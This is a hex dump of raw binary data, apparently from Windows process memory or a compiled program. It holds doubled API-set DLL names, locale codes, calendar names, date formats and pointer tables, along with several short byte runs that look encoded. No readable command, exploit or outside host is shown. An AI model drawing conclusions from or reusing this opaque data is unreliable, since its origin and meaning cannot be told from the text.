8101000078bcc48081010000b87cc480810100006161646476766161707069693333323200000000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d6666696962626565727273732d2d6c6c31312d2d31312d2d31310000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d737379796e6e636368682d2d6c6c31312d2d32322d2d303000000000000000006b6b656572726e6e65656c6c3333323200000000000000000101000003030000462a1f322d00030c63000000000000000101000003030000462a1f35341700650101000003030000462a1f34221122370d191065000000000101000003030000462a1f20361122370d1910650000000002020000030300004927071d1d080d05131f26311b1d1d0a020d3f3606171d06012b3d780000000070b8c880810100008048c880810100008840c880810100009850c88081010000a860c88081010000b870c88081010000c800c88081010000d810c88081010000e42cc88081010000f038c88081010000f830c8808101000008c1c9808101000018d1c9808101000022ebc9808101000024edc9808101000030f9c9808101000038f1c980810100003cf5c980810100004089c98081010000448dc980810100004881c980810100004c85c980810100005099c980810100005891c9808101000064adc9808101000068a1c980810100006ca5c9808101000070b9c9808101000074bdc9808101000078b1c980810100007cb5c980810100008049c98081010000844dc980810100008841c980810100008c45c980810100009059c98081010000945dc980810100009851c980810100009c55c98081010000a069c98081010000a46dc98081010000a861c98081010000ac65c98081010000b079c98081010000b47dc98081010000b871c98081010000bc75c98081010000c009c98081010000c40dc98081010000c801c98081010000cc05c98081010000d019c98081010000d41dc98081010000d811c98081010000dc15c98081010000e029c98081010000f039c9808101000000caca808101000008c2ca808101000018d2ca808101000030faca8081010000408aca80810100005892ca808101000078b2ca80810100009852ca8081010000b872ca8081010000d812ca8081010000f832ca808101000020ebcb8081010000408bcb808101000068a3cb80810100008843cb8081010000b07bcb8081010000d01bcb8081010000e02bcb8081010000e42fcb8081010000f03bcb808101000000cccc808101000024e8cc808101000030fccc8081010000408ccc8081010000509ccc808101000070bccc8081010000905ccc8081010000b874cc8081010000e02ccc808101000008c5cd808101000038f5cd80810100005895cd8081010000804dcd8081010000a865cd8081010000d815cd808101000008c6ce808101000028e6ce808101000022ebc9808101000038f6ce8081010000509ece808101000070bece80810100008846ce8081010000a866ce80810100005f003d031216014c28000000000000005f003c0701060f6c5f002f111210020d6c000000000000005f002c071007020d006c0000000000005f002b1c011a10020d006c00000000005f003907120717020d006c00000000005f00291306171b1d11020d006c0000005f003c0f1e11020d006c00005f003a04030b6900000000005f002f04064402345f002d171607061b0a177400000000005f002a1b0f0d050e090b01640000000072171607061b0a175c280000204e0b12770000000000000020440109091111653d3d00003e003e003c003c00212100003d003d00211c3d005b065d00000000006f1f151713151b1d720000002d133e002a2a00002b002b002d002d002d2d00002b2b0000262600002d13142a2f2f0000252500003c3c00003c013d003e3e00003e033d002c2c0000280129007e7e00005e5e00007c7c0000260026007c007c002a173d002b163d002d103d002f123d0025183d003e00033d3c00013d261b3d007c413d005e633d006016101215030e0942270000000000006016141615030e094227000000000000601615020d004b2760140d09150a09412700000000000000600c030c020d4c530715151d0a4347121413164327000000601307061b07094027000000000000006016140312164544011607060716171b1d5527000000000060161306171b1d5244010909111d07094744011607060716171b1d5527000000600401030714191854430c011d07060716171b1d52430f031c06071742270000601310020d0d135244010909111d07094744011607060716171b1d552700000060161306171b1d52430c011d07060716171b1d52491d111713151b1d5527000060161306171b1d5244011607060716171b1d52491d111713151b1d552700000060161306171b1d52561403121645430c011d07060716171b1d52491d111713151b1d55270000000060161f1b0601140d4c440d1a031c0d020608080b1a544d0c115727000000000060050d48561306171b1d52430c011d07060716171b1d52491d111713151b1d55270000000000000060050d48561306171b1d5244011607060716171b1d52491d111713151b1d552760050d48561306171b1d52561403121645430c011d07060716171b1d52491d111713151b1d55270060030c1f0959430c011d07060716171b1d52430f031c06071742270000000000601511105452171101071c070709402760250d48603206001d49000000000000600c030c020d4c56101215030e094227600c030c020d4c56101215030e0945430c011d07060716171b1d52430f031c0607174227204e0b122c065d0000000000204401090911113e065d000000000000600f0203074943020d001f1a0e40270060101c0d020608080b1a5444010909111145430f031c0607174227000000000060101c0d020608080b1a544401090911113e067d430f031c0607174227000000600d0c0f0f06020144561306171b1d52430c011d07060716171b1d52491d111713151b1d55270000600d0c0f0f06020144561306171b1d5244011607060716171b1d52491d111713151b1d552700000060050d48561306171b1d52430c1f0959430c011d07060716171b1d52491d111713151b1d5527000060050d48561306171b1d52561403121645430c1f0959430c011d07060716171b1d52491d111713151b1d55270000000060041d170f0c040a434907071d1d080d05131f175246091d520727000000000060041d170f0c040a434115111d111d5444011607060716171b1d5246091d5207270000000000000060161306171b1d52430c1f0959430c011d07060716171b1d52491d111713151b1d5527000000000060161306171b1d52561403121645430c1f0959430c011d07060716171b1d52491d111713151b1d552700000000000000600d0c0f0f06020144561306171b1d52430c1f0959430c011d07060716171b1d52491d111713151b1d55270000000000600c030c020d4c530715151d0a43541c1a1704054447121413164327000000006f1f151713151b1d520200022000000020742d09154564211610111b19041b1d5527000000000000206223121645632f0d12005364211610111b19041b1d52411554082800000000206223121645632f0d12005361330013185e27000000000020632f0d12005368210c171313110b115964211610111b19041b1d552700000020632c021d1c091111456f2d080f0617546c230c02151b1d55270000000000000000000000000000050500c0cb0b000000000000000000001d1d00c0c40400000000000000000000969600c0c404000000000000000000008d8d00c0c808000000000000000000008e8e00c0c808000000000000000000008f8f00c0c80800000000000000000000909000c0c80800000000000000000000919100c0c80800000000000000000000929200c0c80800000000000000000000939300c0c80800000000000000000000b4b602c0c80800000000000000000000b5b702c0c808000000000000000000000c0c000000000000030300000000000009090000000000006d6d737363636f6f7272656565652e2e64646c6c6c6c0000432c1d373d111d24221d0c06160073004c05498081010000000000000000000098d149808101000000000000000000005008588081010000104959808101000094dd49808101000094dd49808101000068254d8081010000cc814d8081010000305f6f80810100004c236f80810100000000000000000000eca549808101000010435380810100004c1f53808101000040317180810100007c0d71808101000064096d808101000094dd49808101000048216980810100000000000000000000000000000000000094dd4980810100000000000000000000f4bd49808101000094dd49808101000084cd498081010000602949808101000094dd49808101000060b1d18081010000b061d1808101000038fcc48081010000f021d1808101000030e2d280810100008052d28081010000e032d2808101000030e3d3808101000078bcc4808101000070a3d38081010000b063d38081010000f023d3808101000030e4d480810100008054d48081010000e034d480810100004095d580810100009045d5808101000020e4c48081010000b87cc48081010000e035d580810100006161707069692d2d6d6d73732d2d777769696e6e2d2d6161707070706d6d6f6f646465656c6c2d2d727275756e6e747469696d6d65652d2d6c6c31312d2d31312d2d31310000000000000000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d6464616174746565747469696d6d65652d2d6c6c31312d2d31312d2d313100006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d666669696c6c65652d2d6c6c32322d2d31312d2d3131000000000000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d6c6c6f6f636361616c6c69697a7a6161747469696f6f6e6e2d2d6c6c31312d2d32322d2d3131000000000000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d6c6c6f6f636361616c6c69697a7a6161747469696f6f6e6e2d2d6f6f626273736f6f6c6c6565747465652d2d6c6c31312d2d32322d2d303000000000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d707072726f6f636365657373737374746868727265656161646473732d2d6c6c31312d2d31312d2d32320000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d73737474727269696e6e67672d2d6c6c31312d2d31312d2d30300000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d73737979737369696e6e66666f6f2d2d6c6c31312d2d32322d2d3131000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d777769696e6e727274742d2d6c6c31312d2d31312d2d303000000000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d7878737374746161747465652d2d6c6c32322d2d31312d2d30300000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d7272747463636f6f727265652d2d6e6e747475757373656572722d2d777769696e6e64646f6f77772d2d6c6c31312d2d31312d2d3030000000006161707069692d2d6d6d73732d2d777769696e6e2d2d737365656363757572726969747479792d2d737379797373747465656d6d666675756e6e6363747469696f6f6e6e73732d2d6c6c31312d2d31312d2d30300000000000000000000000006565787874742d2d6d6d73732d2d777769696e6e2d2d6b6b656572726e6e65656c6c333332322d2d7070616163636b6b6161676765652d2d636375757272727265656e6e74742d2d6c6c31312d2d31312d2d30300000000000000000000000006565787874742d2d6d6d73732d2d777769696e6e2d2d6e6e747475757373656572722d2d6464696961616c6c6f6f676762626f6f78782d2d6c6c31312d2d31312d2d30300000000000000000000000006565787874742d2d6d6d73732d2d777769696e6e2d2d6e6e747475757373656572722d2d777769696e6e64646f6f7777737374746161747469696f6f6e6e2d2d6c6c31312d2d31312d2d303000000000757573736565727233333232000000000202000012120000020200001212000002020000121200000202000012120000000000000e0e000047221137360700170b1a243102080a06022c2d6400000000080800001212000004040000121200004c0f0e2c112327061b0709223d78000004040000121200004c230c020d092b2f0c08313b230f0a0d44000000000000000101000016160000020200000202000003030000020200000404000018180000050500000d0d00000606000009090000070700000c0c0000080800000c0c0000090900000c0c00000a0a0000070700000b0b0000080800000c0c0000161600000d0d0000161600000f0f000002020000101000000d0d000011110000121200001212000002020000212100000d0d00003535000002020000414100000d0d000043430000020200005050000011110000525200000d0d0000535300000d0d00005757000016160000595900000b0b00006c6c00000d0d00006d6d000020200000707000001c1c000072720000090900000606000016160000808000000a0a0000818100000a0a000082820000090900008383000016160000848400000d0d000091910000292900009e9e00000d0d0000a1a1000002020000a4a400000b0b0000a7a700000d0d0000b7b7000011110000cece000002020000d7d700000b0b0000181f07000c0c0000f82fd7808101000008d0d8808101000018c0d8808101000028f0d880810100006a6a61612d2d4a4a50500000000000007a7a68682d2d43434e4e0000000000006b6b6f6f2d2d4b4b52520000000000007a7a68682d2d54545757000000000000000000000000000000dbdb808101000004dfdb808101000008d3db80810100000cd7db808101000010cbdb808101000014cfdb808101000018c3db80810100001cc7db808101000024ffdb808101000030ebdb808101000038e3db80810100004893db8081010000548fdb808101000060bbdb80810100006cb7db808101000070abdb808101000074afdb808101000078a3db80810100007ca7db8081010000805bdb8081010000845fdb80810100008853db80810100008c57db8081010000904bdb8081010000944fdb80810100009843db8081010000a07bdb8081010000a873db8081010000b46fdb8081010000bc67db80810100007ca7db8081010000c41fdb8081010000cc17db8081010000d40fdb8081010000e03bdb8081010000f02bdb8081010000f823db808101000008d4dc808101000014c8dc808101000018c4dc808101000020fcdc808101000030ecdc80810100004894dc808101000001010000000000005884dc808101000060bcdc808101000068b4dc808101000070acdc808101000078a4dc8081010000805cdc80810100008854dc8081010000904cdc8081010000a07cdc8081010000b06cdc8081010000c01cdc8081010000d804dc8081010000f02cdc808101000000dddd808101000018c5dd808101000020fddd808101000028f5dd808101000030eddd808101000038e5dd8081010000409ddd80810100004895dd8081010000508ddd80810100005885dd808101000060bddd808101000068b5dd808101000070addd808101000078a5dd80810100008855dd8081010000a07ddd8081010000b06ddd808101000038e5dd8081010000c01ddd8081010000d00ddd8081010000e03ddd8081010000f02ddd808101000008d6de808101000018c6de808101000030eede8081010000449ade80810100004c92de80810100005886de808101000070aede80810100009846de8081010000b06ede808101000053261b6e4d22016e5421106557320164543c1d7546341b695332157453261b0a051879004d22010a051879000000000054211016170518795732010a0b1617051879000000000000543c1d07011705187900000046341b0d05187900000000005332150107160518790000004a2b0f6e462307624d2c1372413102724d2c18794a3f1b6e4a3f196c41341267533615704f2c17744e21197644210663000000004a2b0f1b14130b79462307100714130b790000004d2c13110b6800004131021b056c00004a3f1b0b650000004a3f1915790000004134121206077400000000005336150411080f0717720000000000004f2c171b0d0717724e211913080f0717720000000000000044210606080f071772000000410c4d00501d4d00000000004d00624b004b5600790000000000000064000000480c6d0000006d4400480c59000000790000000048007257005749007300000000000000535375756e6e00004d4d6f6f6e6e000054547575656500005757656564640000545468687575000046467272696900005353616174740000535375756e6e646461617979000000004d4d6f6f6e6e64646161797900000000545475756565737364646161797900005757656564646e6e65657373646461617979000000000000545468687575727273736464616179790000000000000000464672726969646461617979000000005353616174747575727264646161797900000000000000004a4a61616e6e000046466565626200004d4d61617272000041417070727200004d4d6161797900004a4a75756e6e00004a4a75756c6c0000414175756767000053536565707000004f4f6363747400004e4e6f6f7676000044446565636300004a4a61616e6e757561617272797900004646656562627272757561617272797900000000000000004d4d616172726363686800000000000041417070727269696c6c0000000000004a4a75756e6e656500000000000000004a4a75756c6c7979000000000000000041417575676775757373747400000000535365657070747465656d6d6262656572720000000000004f4f636374746f6f62626565727200004e4e6f6f767665656d6d626265657272000000000000000044446565636365656d6d6262656572720000000041414d4d0000000050504d4d00000000000000004d4d4d4d2f2f646464642f2f79797979000000000000000064646464646464642c2c20204d4d4d4d4d4d4d4d2020646464642c2c202079797979797979790000484848483a3a6d6d6d6d3a3a73737373000000000000000065656e6e2d2d5555535300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000202020202020202020202020202020202020282828282828282828282020202020202020202020202020202020202020202020202020202020202020202020204848101010101010101010101010101010101010101010101010101010101010848484848484848484848484848484848484848410101010101010101010101010108181818181818181818181810101010101010101010101010101010101010101010101010101010101010101010101010101010110101010101010101010101082828282828282828282828202020202020202020202020202020202020202020202020202020202020202020202020202020202101010101010101020200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000080010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f010301070103017f010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f01030107010301ff010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f010301070103017f210301070103010f010301070103011f010301070103010f010321070103013f010301070103010f010301070103011f010301070103010f01030107010301ff010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f010301070103017f010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f010301070103017f010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f010301070103017f010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f01030107010301ff010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f010301070103017f010301070103010f010301070103011f010301070103010f010301070103013f210301070103010f010301070103011f010301070103010f01032107010301ff010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f010301070103017f010301070103010f010301070103011f010301070103010f010301070103013f010301070103010f010301070103011f010301070103010f01030107010301fe0100000000000000f3f38081010000020200000000000008fbf38081010000030300000000000010e3f38081010000040400000000000018ebf38081010000050500000000000028dbf38081010000060600000000000030c3f38081010000070700000000000038cbf38081010000080800000000000040b3f38081010000090900000000000048bbf380810100000a0a00000000000050a3f380810100000b0b00000000000058abf380810100000c0c0000000000006093f380810100000d0d000000000000689bf380810100000e0e0000000000007083f380810100000f0f000000000000788bf3808101000010100000000000008073f380810100001111000000000000887bf3808101000012120000000000009063f380810100001313000000000000986bf380810100001414000000000000a053f380810100001515000000000000a85bf380810100001616000000000000b043f380810100001818000000000000b84bf380810100001919000000000000c033f380810100001a1a000000000000c83bf380810100001b1b000000000000d023f380810100001c1c000000000000d82bf380810100001d1d000000000000e013f380810100001e1e000000000000e81bf380810100001f1f000000000000f003f380810100002020000000000000f80bf38081010000212100000000000000f4f48081010000222200000000000008fcf48081010000232300000000000010e4f48081010000242400000000000018ecf48081010000252500000000000020d4f48081010000262600000000000028dcf48081010000272700000000000030c4f48081010000292900000000000038ccf480810100002a2a00000000000040b4f480810100002b2b00000000000048bcf480810100002c2c00000000000050a4f480810100002d2d00000000000058acf480810100002f2f0000000000006094f480810100003636000000000000689cf4808101000037370000000000007084f480810100003838000000000000788cf4808101000039390000000000008074f480810100003e3e000000000000887cf480810100003f3f0000000000009064f480810100004040000000000000986cf480810100004141000000000000a054f480810100004343000000000000a85cf480810100004444000000000000b044f480810100004646000000000000b84cf480810100004747000000000000c034f480810100004949000000000000c83cf480810100004a4a000000000000d024f480810100004b4b000000000000d82cf480810100004e4e000000000000e014f480810100004f4f000000000000e81cf480810100005050000000000000f004f480810100005656000000000000f80cf48081010000575700000000000000f5f580810100005a5a00000000000008fdf58081010000656500000000000010e5f580810100007f7f00000000000018edf58081010000010504000000000020d5f58081010000020604000000000030c5f58081010000030704000000000040b5f58081010000040004000000000028f0d88081010000050104000000000050a5f5808101000006020400000000006095f5808101000007030400000000007085f58081010000080c0400000000008075f58081010000090d040000000000b06ede80810100000b0f0400000000009065f580810100000c08040000000000a055f580810100000d09040000000000b045f580810100000e0a040000000000c035f580810100000f0b040000000000d025f580810100001014040000000000e015f580810100001115040000000000f82fd78081010000121604000000000018c0d880810100001317040000000000f005f58081010000141004000000000000f6f68081010000151104000000000010e6f68081010000161204000000000020d6f68081010000181c04000000000030c6f68081010000191d04000000000040b6f680810100001a1e04000000000050a6f680810100001b1f0400000000006096f680810100001c180400000000007086f680810100001d190400000000008076f680810100001e1a0400000000009066f680810100001f1b040000000000a056f680810100002024040000000000b046f680810100002125040000000000c036f680810100002226040000000000d026f680810100002327040000000000e016f680810100002420040000000000f006f68081010000252104000000000000f7f78081010000262204000000000010e7f78081010000272304000000000020d7f78081010000292d04000000000030c7f780810100002a2e04000000000040b7f780810100002b2f04000000000050a7f780810100002c280400000000006097f780810100002d29040000000000788ff780810100002f2b040000000000887ff780810100003236040000000000986ff780810100003430040000000000a85ff780810100003531040000000000b84ff780810100003632040000000000c83ff780810100003733040000000000d82ff78081010000383c040000000000e81ff78081010000393d040000000000f80ff780810100003a3e04000000000008f0f880810100003b3f04000000000018e0f880810100003e3a04000000000028d0f880810100003f3b04000000000038c0f88081010000404404000000000048b0f88081010000414504000000000058a0f8808101000043470400000000006890f8808101000044400400000000008078f8808101000045410400000000009068f880810100004642040000000000a058f880810100004743040000000000b048f88081010000494d040000000000c038f880810100004a4e040000000000d028f880810100004b4f040000000000e018f880810100004c48040000000000f008f880810100004e4a04000000000000f9f980810100004f4b04000000000010e9f98081010000505404000000000020d9f98081010000525604000000000030c9f98081010000565204000000000040b9f98081010000575304000000000050a9f980810100005a5e0400000000006099f9808101000065610400000000007089f980810100006b6f0400000000008079f980810100006c680400000000009069f980810100008185040000000000a059f980810100000109080000000000b049f98081010000040c08000000000008d0d88081010000070f080000000000c039f980810100000901080000000000d029f980810100000a02080000000000e019f980810100000c04080000000000f009f98081010000101808000000000000fafa8081010000131b08000000000010eafa8081010000141c08000000000020dafa8081010000161e08000000000030cafa80810100001a1208000000000040bafa80810100001d1508000000000058a2fa80810100002c240800000000006892fa80810100003b33080000000000807afa80810100003e36080000000000906afa8081010000434b080000000000a05afa80810100006b63080000000000b842fa8081010000010d0c0000000000c832fa808101000004080c0000000000d822fa8081010000070b0c0000000000e812fa808101000009050c0000000000f802fa80810100000a060c000000000008f3fb80810100000c000c000000000018e3fb80810100001a160c000000000028d3fb80810100003b370c000000000040bbfb80810100006b670c000000000050abfb80810100000111100000000000609bfb80810100000414100000000000708bfb80810100000717100000000000807bfb80810100000919100000000000906bfb80810100000a1a100000000000a05bfb80810100000c1c100000000000b04bfb80810100001a0a100000000000c03bfb80810100003b2b100000000000d02bfb80810100000115140000000000e01bfb80810100000410140000000000f00bfb8081010000071314000000000000fcfc8081010000091d14000000000010ecfc80810100000a1e14000000000020dcfc80810100000c1814000000000030ccfc80810100001a0e14000000000040bcfc80810100003b2f14000000000058a4fc808101000001191800000000006894fc808101000009111800000000007884fc80810100000a121800000000008874fc80810100000c141800000000009864fc80810100001a02180000000000a854fc80810100003b23180000000000c03cfc8081010000011d1c0000000000d02cfc808101000009151c0000000000e01cfc80810100000a161c0000000000f00cfc80810100001a061c000000000000fdfd80810100003b271c000000000018e5fd8081010000012120000000000028d5fd8081010000092920000000000038c5fd80810100000a2a20000000000048b5fd80810100003b1b20000000000058a5fd808101000001252400000000006895fd8081010000092d2400000000007885fd80810100000a2e2400000000008875fd80810100003b1f2400000000009865fd80810100000129280000000000a855fd80810100000921280000000000b845fd80810100000a22280000000000c835fd8081010000012d2c0000000000d825fd808101000009252c0000000000e815fd80810100000a262c0000000000f805fd8081010000013130000000000008f6fe8081010000093930000000000018e6fe80810100000a3a30000000000028d6fe8081010000013534000000000038c6fe8081010000093d34000000000048b6fe80810100000a3e34000000000058a6fe808101000001393800000000006896fe80810100000a323800000000007886fe8081010000013d3c00000000008876fe80810100000a363c00000000009866fe80810100000141400000000000a856fe80810100000a4a400000000000b846fe80810100000a4e440000000000c836fe80810100000a42480000000000d826fe80810100000a464c0000000000e816fe80810100000a5a500000000000f806fe808101000004787c000000000008f7ff80810100001a667c000000000018e7ff80810100006161727200000000626267670000000063636161000000007a7a68682d2d4343484853530000000063637373000000006464616100000000646465650000000065656c6c0000000065656e6e0000000065657373000000006666696900000000666672720000000068686565000000006868757500000000696973730000000069697474000000006a6a6161000000006b6b6f6f000000006e6e6c6c000000006e6e6f6f0000000070706c6c00000000707074740000000072726f6f000000007272757500000000686872720000000073736b6b0000000073737171000000007373767600000000747468680000000074747272000000007575727200000000696964640000000075756b6b00000000626265650000000073736c6c0000000065657474000000006c6c7676000000006c6c74740000000066666161000000007676696900000000686879790000000061617a7a0000000065657575000000006d6d6b6b0000000061616666000000006b6b61610000000066666f6f0000000068686969000000006d6d7373000000006b6b6b6b000000006b6b797900000000737377770000000075757a7a00000000747474740000000070706161000000006767757500000000747461610000000074746565000000006b6b6e6e000000006d6d72720000000073736161000000006d6d6e6e0000000067676c6c000000006b6b6f6f6b6b0000737379797272000064646969767600000000000000000000616172722d2d53534141000000000000626267672d2d42424747000000000000636361612d2d45455353000000000000636373732d2d43435a5a000000000000646461612d2d44444b4b000000000000646465652d2d4444454500000000000065656c6c2d2d47475252000000000000666669692d2d46464949000000000000666672722d2d46465252000000000000686865652d2d49494c4c000000000000686875752d2d48485555000000000000696973732d2d49495353000000000000696974742d2d494954540000000000006e6e6c6c2d2d4e4e4c4c0000000000006e6e62622d2d4e4e4f4f00000000000070706c6c2d2d50504c4c000000000000707074742d2d4242525200000000000072726f6f2d2d52524f4f000000000000727275752d2d52525555000000000000686872722d2d4848525200000000000073736b6b2d2d53534b4b000000000000737371712d2d41414c4c000000000000737376762d2d53534545000000000000747468682d2d54544848000000000000747472722d2d54545252000000000000757572722d2d50504b4b000000000000696964642d2d4949444400000000000075756b6b2d2d55554141000000000000626265652d2d4242595900000000000073736c6c2d2d53534949000000000000656574742d2d454545450000000000006c6c76762d2d4c4c56560000000000006c6c74742d2d4c4c5454000000000000666661612d2d49495252000000000000767669692d2d56564e4e000000000000686879792d2d41414d4d00000000000061617a7a2d2d41415a5a2d2d4c4c616174746e6e00000000656575752d2d454553530000000000006d6d6b6b2d2d4d4d4b4b00000000000074746e6e2d2d5a5a4141000000000000787868682d2d5a5a41410000000000007a7a75752d2d5a5a4141000000000000616166662d2d5a5a41410000000000006b6b61612d2d4747454500000000000066666f6f2d2d46464f4f000000000000686869692d2d49494e4e0000000000006d6d74742d2d4d4d5454000000000000737365652d2d4e4e4f4f0000000000006d6d73732d2d4d4d59590000000000006b6b6b6b2d2d4b4b5a5a0000000000006b6b79792d2d4b4b4747000000000000737377772d2d4b4b454500000000000075757a7a2d2d55555a5a2d2d4c4c616174746e6e00000000747474742d2d5252555500000000000062626e6e2d2d49494e4e000000000000707061612d2d49494e4e000000000000676775752d2d49494e4e000000000000747461612d2d49494e4e000000000000747465652d2d49494e4e0000000000006b6b6e6e2d2d49494e4e0000000000006d6d6c6c2d2d49494e4e0000000000006d6d72722d2d49494e4e000000000000737361612d2d49494e4e0000000000006d6d6e6e2d2d4d4d4e4e000000000000636379792d2d4747424200000000000067676c6c2d2d454553530000000000006b6b6f6f6b6b2d2d49494e4e000000007373797972722d2d53535959000000006464696976762d2d4d4d565600000000717175757a7a2d2d42424f4f000000006e6e73732d2d5a5a41410000000000006d6d69692d2d4e4e5a5a000000000000616172722d2d49495151000000000000646465652d2d4343484800000000000065656e6e2d2d47474242000000000000656573732d2d4d4d5858000000000000666672722d2d42424545000000000000696974742d2d434348480000000000006e6e6c6c2d2d424245450000000000006e6e6e6e2d2d4e4e4f4f000000000000707074742d2d50505454000000000000737372722d2d535350502d2d4c4c616174746e6e00000000737376762d2d4646494900000000000061617a7a2d2d41415a5a2d2d4343797972726c6c00000000737365652d2d535345450000000000006d6d73732d2d42424e4e00000000000075757a7a2d2d55555a5a2d2d4343797972726c6c00000000717175757a7a2d2d4545434300000000616172722d2d454547470000000000007a7a68682d2d48484b4b000000000000646465652d2d4141545400000000000065656e6e2d2d41415555000000000000656573732d2d45455353000000000000666672722d2d43434141000000000000737372722d2d535350502d2d4343797972726c6c00000000737365652d2d46464949000000000000717175757a7a2d2d5050454500000000616172722d2d4c4c59590000000000007a7a68682d2d53534747000000000000646465652d2d4c4c555500000000000065656e6e2d2d43434141000000000000656573732d2d47475454000000000000666672722d2d43434848000000000000686872722d2d4242414100000000000073736d6d6a6a2d2d4e4e4f4f00000000616172722d2d44445a5a0000000000007a7a68682d2d4d4d4f4f000000000000646465652d2d4c4c494900000000000065656e6e2d2d4e4e5a5a000000000000656573732d2d43435252000000000000666672722d2d4c4c5555000000000000626273732d2d424241412d2d4c4c616174746e6e0000000073736d6d6a6a2d2d5353454500000000616172722d2d4d4d414100000000000065656e6e2d2d49494545000000000000656573732d2d50504141000000000000666672722d2d4d4d4343000000000000737372722d2d424241412d2d4c4c616174746e6e0000000073736d6d61612d2d4e4e4f4f00000000616172722d2d54544e4e00000000000065656e6e2d2d5a5a4141000000000000656573732d2d44444f4f000000000000737372722d2d424241412d2d4343797972726c6c0000000073736d6d61612d2d5353454500000000616172722d2d4f4f4d4d00000000000065656e6e2d2d4a4a4d4d000000000000656573732d2d5656454500000000000073736d6d73732d2d4646494900000000616172722d2d5959454500000000000065656e6e2d2d43434242000000000000656573732d2d43434f4f00000000000073736d6d6e6e2d2d4646494900000000616172722d2d5353595900000000000065656e6e2d2d42425a5a000000000000656573732d2d50504545000000000000616172722d2d4a4a4f4f00000000000065656e6e2d2d54545454000000000000656573732d2d41415252000000000000616172722d2d4c4c424200000000000065656e6e2d2d5a5a5757000000000000656573732d2d45454343000000000000616172722d2d4b4b575700000000000065656e6e2d2d50504848000000000000656573732d2d43434c4c000000000000616172722d2d41414545000000000000656573732d2d55555959000000000000616172722d2d42424848000000000000656573732d2d50505959000000000000616172722d2d51514141000000000000656573732d2d42424f4f000000000000656573732d2d53535656000000000000656573732d2d48484e4e000000000000656573732d2d4e4e4949000000000000656573732d2d505052520000000000007a7a68682d2d43434848545400000000737372720000000018edf580810100004242000000000000689cf480810100002c2c000000000000606d0c8181010000717100000000000000f3f380810100000000000000000000707d0c8181010000d8d8000000000000808d0c8181010000dada000000000000909d0c8181010000b1b1000000000000a0ad0c8181010000a0a0000000000000b0bd0c81810100008f8f000000000000c0cd0c8181010000cfcf000000000000d0dd0c8181010000d5d5000000000000e0ed0c8181010000d2d2000000000000f0fd0c8181010000a9a9000000000000000e0f8181010000b9b9000000000000101e0f8181010000c4c4000000000000202e0f8181010000dcdc000000000000303e0f81810100004343000000000000404e0f8181010000cccc000000000000505e0f8181010000bfbf000000000000606e0f8181010000c8c800000000000050a4f480810100002929000000000000707e0f81810100009b9b00000000000088860f81810100006b6b00000000000010e4f480810100002121000000000000a0ae0f8181010000636300000000000008fbf380810100000101000000000000b0be0f81810100004444000000000000c0ce0f81810100007d7d000000000000d0de0f8181010000b7b700000000000010e3f380810100000202000000000000e8e60f8181010000454500000000000028dbf380810100000404000000000000f8f60f8181010000474700000000000008070e8181010000878700000000000030c3f38081010000050500000000000018170e8181010000484800000000000038cbf38081010000060600000000000028270e8181010000a2a200000000000038370e8181010000919100000000000048470e8181010000494900000000000058570e8181010000b3b300000000000068670e8181010000abab00000000000010e5f58081010000414100000000000078770e81810100008b8b00000000000040b3f38081010000070700000000000088870e81810100004a4a00000000000048bbf38081010000080800000000000098970e8181010000a3a3000000000000a8a70e8181010000cdcd000000000000b8b70e8181010000acac000000000000c8c70e8181010000c9c9000000000000d8d70e81810100009292000000000000e8e70e8181010000baba000000000000f8f70e8181010000c5c50000000000000818118181010000b4b40000000000001808118181010000d6d60000000000002838118181010000d0d000000000000038281181810100004b4b0000000000004858118181010000c0c00000000000005848118181010000d3d300000000000050a3f3808101000009090000000000006878118181010000d1d10000000000007868118181010000dddd0000000000008898118181010000d7d70000000000009888118181010000caca000000000000a8b8118181010000b5b5000000000000b8a8118181010000c1c1000000000000c8d8118181010000d4d4000000000000d8c8118181010000a4a4000000000000e8f8118181010000adad000000000000f8e8118181010000dfdf000000000000081910818101000093930000000000001809108181010000e0e00000000000002839108181010000bbbb0000000000003829108181010000cece0000000000004859108181010000e1e10000000000005849108181010000dbdb0000000000006879108181010000dede0000000000007869108181010000d9d90000000000008899108181010000c6c600000000000020d4f4808101000023230000000000009889108181010000656500000000000058acf480810100002a2a000000000000a8b91081810100006c6c00000000000038ccf480810100002626000000000000b8a9108181010000686800000000000058abf380810100000a0a000000000000c8d91081810100004c4c000000000000788cf480810100002e2e000000000000d8c910818101000073730000000000006093f380810100000b0b000000000000e8f91081810100009494000000000000f8e9108181010000a5a5000000000000081a138181010000aeae